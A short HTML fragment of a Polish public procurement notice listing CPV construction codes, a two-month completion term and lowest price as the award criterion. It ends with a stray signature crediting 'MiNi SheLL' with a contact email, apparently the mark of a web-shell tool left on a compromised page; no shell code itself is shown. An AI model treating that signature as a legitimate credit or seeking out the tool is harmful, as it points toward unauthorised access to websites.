<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.32.00.00-6, 45.41.00.00-4, 45.44.21.00-8, 45.26.13.20-3, 45.42.11.32-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com